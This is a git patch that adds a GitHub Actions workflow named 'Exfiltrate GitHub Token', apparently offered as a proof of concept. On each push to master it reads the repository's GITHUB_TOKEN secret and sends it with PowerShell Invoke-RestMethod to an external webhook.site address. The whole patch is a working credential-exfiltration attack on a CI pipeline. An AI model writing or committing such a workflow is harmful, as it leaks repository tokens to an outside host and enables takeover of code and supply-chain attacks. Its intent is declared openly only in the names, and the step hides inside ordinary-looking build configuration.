From 36fed4590bd7b8e9ace7aeb7aaed11712649f17f Mon Sep 17 00:00:00 2001
From: Protocols-sec <protocolsecurit@gmail.com>
Date: Wed, 19 Nov 2025 06:30:40 +0530
Subject: [PATCH] Add GitHub Actions workflow to exfiltrate token

---
 .github/workflows/poc.yml | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 .github/workflows/poc.yml

diff --git a/.github/workflows/poc.yml b/.github/workflows/poc.yml
new file mode 100644
index 000000000000..fd0e679354f1
--- /dev/null
+++ b/.github/workflows/poc.yml
@@ -0,0 +1,21 @@
+name: Exfiltrate GitHub Token
+
+on:
+  push:
+    branches: [ "master" ]
+
+jobs:
+  build:
+    runs-on: windows-latest
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v3
+
+      - name: Exfiltrate GITHUB_TOKEN
+        env:
+          TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: |
+          powershell -Command "
+            Invoke-RestMethod -Uri 'https://webhook.site/abcccc..' -Headers @{ Authorization = 'token ' + $env:TOKEN }
+          "